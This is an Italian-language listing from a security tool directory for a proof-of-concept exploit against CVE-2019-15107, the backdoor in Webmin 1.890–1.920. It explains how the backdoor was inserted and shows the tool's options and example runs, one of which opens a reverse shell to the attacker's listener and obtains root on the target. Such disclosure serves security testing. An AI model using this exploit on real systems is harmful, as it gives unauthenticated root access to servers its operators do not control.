Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2019-15107 — Proof-of-concept exploit per CVE-2019-15107 (Webmin <= 1.920) che consente RCE non autenticata tramite command injection. | Kitploit
Strumenti/GitHubGitHub/adampawelczyk/cve-2019-15107
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubadampawelczyk/cve-2019-15107

cve-2019-15107

Proof-of-concept exploit per CVE-2019-15107 (Webmin <= 1.920) che consente RCE non autenticata tramite command injection.

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-15107 - Webmin RCE non autenticata

Descrizione

Questo repository contiene un exploit proof-of-concept (PoC) per CVE-2019-15107 che interessa le versioni di Webmin dalla 1.890 alla 1.920.

Lo script sfrutta una backdoor nelle versioni dalla 1.890 alla 1.920 che consente a utenti non autenticati di iniettare comandi nell'endpoint password_change.cgi tramite il parametro old (nella v.1.890 expired). Solo i download da SourceForge sono stati backdoorati, ma sono elencati come download ufficiali sul sito del progetto.

Attaccanti sconosciuti hanno inserito istruzioni Perl qx nel codice sorgente del server di build in due occasioni separate: una volta nell'aprile 2018, introducendo la backdoor nella versione 1.890, e nel luglio 2018, reintroducendola nelle versioni dalla 1.900 alla 1.920.

Solo la versione 1.890 è sfruttabile nell'installazione predefinita. Le versioni successive interessate richiedono che la funzione di modifica password scaduta sia abilitata.

Ambiente testato

L'exploit è stato testato con successo contro:

  • Versione Webmin: 1.890
  • Sistema operativo: Ubuntu 18.04.4 LTS
  • Utilizzo

    root@kitploit:~
    python3 cve-2019-15107.py -r <TARGET_IP> -l <LOCAL_IP> [options]
    
    options:
      -h, --help                 Show this help message and exit
      -r, --rhost RHOST          Target IP address
      -rp, --rport RPORT         Target port (default: 10000)
      -l, --lhost LHOST          Local IP for reverse shell
      -lp, --lport LPORT         Local port for reverse shell (default: 4343)
      -s, --scheme {http,https}  Protocol to use (default: https)
      -x, --proxy [PROXY]        Use proxy (default: http://127.0.0.1:8080)
      -f, --force                Force exploitation even if detection fails
      -c, --cmd CMD              Execute a single command instead of reverse shell
    

    Esempio

    root@kitploit:~
    ┌──(adam㉿kali)-[~]
    └─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129
    
       _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
      / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
     | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
      \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  
    
      CVE-2019-15107 | Webmin Unauthenticated RCE
      by adampawelczyk
    
    [*] Checking vulnerability...
    [*] Detecting target version...
    [+] Detected Webmin 1.890
    [+] Target is vulnerable
    [*] Starting listener on port 4343...
    listening on [any] 4343 ...
    [*] Sending payload...
    connect to [192.168.158.129] from (UNKNOWN) [10.114.159.93] 59970
    bash: cannot set terminal process group (1314): Inappropriate ioctl for device
    bash: no job control in this shell
    root@source:/usr/share/webmin/# whoami
    whoami
    root
    root@source:/usr/share/webmin/# 
    
    root@kitploit:~
    ┌──(adam㉿kali)-[~]
    └─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129 -c whoami                                                                                                                                                                 
    
       _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
      / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
     | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
      \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  
    
      CVE-2019-15107 | Webmin Unauthenticated RCE
      by adampawelczyk
    
    [*] Checking vulnerability...
    [*] Detecting target version...
    [+] Detected Webmin 1.890
    [+] Target is vulnerable
    [+] Command output:
    ========================================
    root
    

    Riferimenti

    • https://nvd.nist.gov/vuln/detail/CVE-2019-15107
    • https://webmin.com/security/
    • https://www.exploit-db.com/exploits/47230

    Avvertenza

    Questo strumento è destinato esclusivamente a scopi educativi e di test autorizzati. L'uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si ha il permesso di testare è illegale. Usare in modo responsabile.

    Scarica lo strumento